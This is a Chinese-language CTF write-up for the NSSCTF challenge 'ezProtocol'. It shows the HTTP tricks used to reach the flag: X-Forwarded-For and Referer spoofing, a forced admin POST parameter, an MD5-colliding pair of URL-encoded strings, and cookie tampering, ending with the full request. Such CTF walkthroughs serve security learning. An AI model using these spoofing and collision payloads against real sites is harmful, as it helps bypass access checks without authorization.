跳转至

每日一题 —— [NUSTCTF 2022 新生赛]ezProtocol

题目地址: https://www.nssctf.cn/problem/3175

这题通篇看下来就是一个不断提交 http 请求的题目,所以较为简单。但是我本以为可以秒掉,但是却还是掉坑里了,主要是工具的使用出了问题,总体的思路是对的。在此记录一下

在前半部分,我们使用 hoppscotch(原 postwoman) 作为我们的 http 请求工具,虽然 HackBar 也一样,但是这题我用 HackBar 出现了一些小问题,所以为了方便,我从一开始就用 postwoman 来写。

You must come from 127.0.0.1

这一步,要求你从 127.0.0.1 发起请求,显然这是 xff 伪造。打开 postwoman, 在 header 一栏添加如下 payload:

X-Forwarded-For: 127.0.0.1

Have you just visited http://localhost/?

这一步,要求你从 http://localhost/ 这个网址跳转过来。我们使用的是 referer 伪造。在 header 一栏添加如下 payload:

Referer: "http://localhost/"

You must use POST

这一步,直接把方法改成 POST 就可以了。

Your posted username must be admin

这一步要求你 post 一个 username 参数,值为 admin ,直接在 body 一栏添加 payload:

username: admin

Your posted p1 and p2 must be different but have the same md5

这一步要求你 post 两个变量,值不能相等,但是他们的 md5 值要相等。我们可能会想到 0e 绕过或者是数组绕过,但是通过 wappalyzer 插件或者是通过返回的 x-powered-by header,可以知道服务器使用的 php8, 也就是我们必须使用最常规的 md5 碰撞。

我们通过搜索,找到了两串不一样的字符串,这里直接给出 payload:

p1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&p2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

我们发现,我们通过 postwoman 无法这么直接提交,所以我们在 postwoman 得到的 http 请求字符串复制下来,复制到 burpsuite 中重新提交。为什么这么做呢,是因为 postwoman 会自动把这一段已经编码好的字符串再次编码一次。所以我们需要在 burpsuite 直接提交原生字符串,绝不会有任何修改。这一步在 HackBar 里面直接报错,原因未知。

I don' want to follow diet menu anymore, I want to have a big meal

这一步初看看不懂,但是发现对面传来了 Set-Cookie 的 header, 所以我们新建一个 Cookie 头,并按照要求把它改成 big%20meal ,如下:

Cookie: dinner=big%20meal

得到 flag.

最终 http 请求字符串如下:

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/
Host: node5.anna.nssctf.cn:26594
Content-Length: 324
Cookie: dinner=big%20meal

username=admin&p1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&p2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

文章热度:0次阅读